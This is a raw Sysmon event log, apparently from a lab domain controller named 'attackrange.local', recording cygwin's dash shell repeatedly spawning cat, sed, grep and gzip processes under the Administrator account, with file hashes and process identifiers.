14:55:55.372{A8622C2F-53FB-6078-F808-00000000AE01}6064C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.363{A8622C2F-53FB-6078-F708-00000000AE01}1140C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-F608-00000000AE01}3136C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048292Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.355{A8622C2F-53FB-6078-F608-00000000AE01}3136C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048289Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.355{A8622C2F-53FB-6078-F508-00000000AE01}4424C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-F308-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.348{A8622C2F-53FB-6078-F408-00000000AE01}6440C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-F208-00000000AE01}4364C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048269Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.348{A8622C2F-53FB-6078-F308-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048257Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.341{A8622C2F-53FB-6078-F208-00000000AE01}4364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048245Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.333{A8622C2F-53FB-6078-F108-00000000AE01}1392C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-F008-00000000AE01}1844C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048235Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.326{A8622C2F-53FB-6078-F008-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048222Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.317{A8622C2F-53FB-6078-EF08-00000000AE01}6968C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-ED08-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048203Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.310{A8622C2F-53FB-6078-EE08-00000000AE01}6592C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-EB08-00000000AE01}5516C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048202Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.310{A8622C2F-53FB-6078-ED08-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048184Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.302{A8622C2F-53FB-6078-EC08-00000000AE01}5864C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-EA08-00000000AE01}3368C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048182Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.302{A8622C2F-53FB-6078-EB08-00000000AE01}5516C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048170Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.295{A8622C2F-53FB-6078-EA08-00000000AE01}3368C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048158Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.287{A8622C2F-53FB-6078-E908-00000000AE01}6672C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-E808-00000000AE01}3220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048147Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.280{A8622C2F-53FB-6078-E808-00000000AE01}3220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.271{A8622C2F-53FB-6078-E708-00000000AE01}5212C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-E508-00000000AE01}5404C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048117Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.264{A8622C2F-53FB-6078-E608-00000000AE01}3300C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-E308-00000000AE01}5116C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048115Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.264{A8622C2F-53FB-6078-E508-00000000AE01}5404C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048096Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.257{A8622C2F-53FB-6078-E408-00000000AE01}1140C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-E208-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048095Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.257{A8622C2F-53FB-6078-E308-00000000AE01}5116C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048082Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.249{A8622C2F-53FB-6078-E208-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048070Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.241{A8622C2F-53FB-6078-E108-00000000AE01}3208C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-E008-00000000AE01}4344C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048060Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.234{A8622C2F-53FB-6078-E008-00000000AE01}4344C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048048Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.225{A8622C2F-53FB-6078-DF08-00000000AE01}5776C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-DD08-00000000AE01}5184C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048030Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.218{A8622C2F-53FB-6078-DE08-00000000AE01}1392C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-DB08-00000000AE01}1844C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048028Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.218{A8622C2F-53FB-6078-DD08-00000000AE01}5184C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048010Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.211{A8622C2F-53FB-6078-DC08-00000000AE01}4788C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-DA08-00000000AE01}6196C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048008Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.211{A8622C2F-53FB-6078-DB08-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047996Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.204{A8622C2F-53FB-6078-DA08-00000000AE01}6196C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.195{A8622C2F-53FB-6078-D908-00000000AE01}5344C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-D808-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047973Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.188{A8622C2F-53FB-6078-D808-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.180{A8622C2F-53FB-6078-D708-00000000AE01}924C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-D508-00000000AE01}3368C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047943Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.172{A8622C2F-53FB-6078-D608-00000000AE01}7016C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-D308-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.172{A8622C2F-53FB-6078-D508-00000000AE01}3368C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.165{A8622C2F-53FB-6078-D408-00000000AE01}5804C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-D208-00000000AE01}2112C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047921Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.165{A8622C2F-53FB-6078-D308-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.158{A8622C2F-53FB-6078-D208-00000000AE01}2112C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047896Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.150{A8622C2F-53FB-6078-D108-00000000AE01}5108C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-D008-00000000AE01}5052C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047886Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.143{A8622C2F-53FB-6078-D008-00000000AE01}5052C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047874Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.134{A8622C2F-53FB-6078-CF08-00000000AE01}4424C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-CD08-00000000AE01}4568C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047856Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 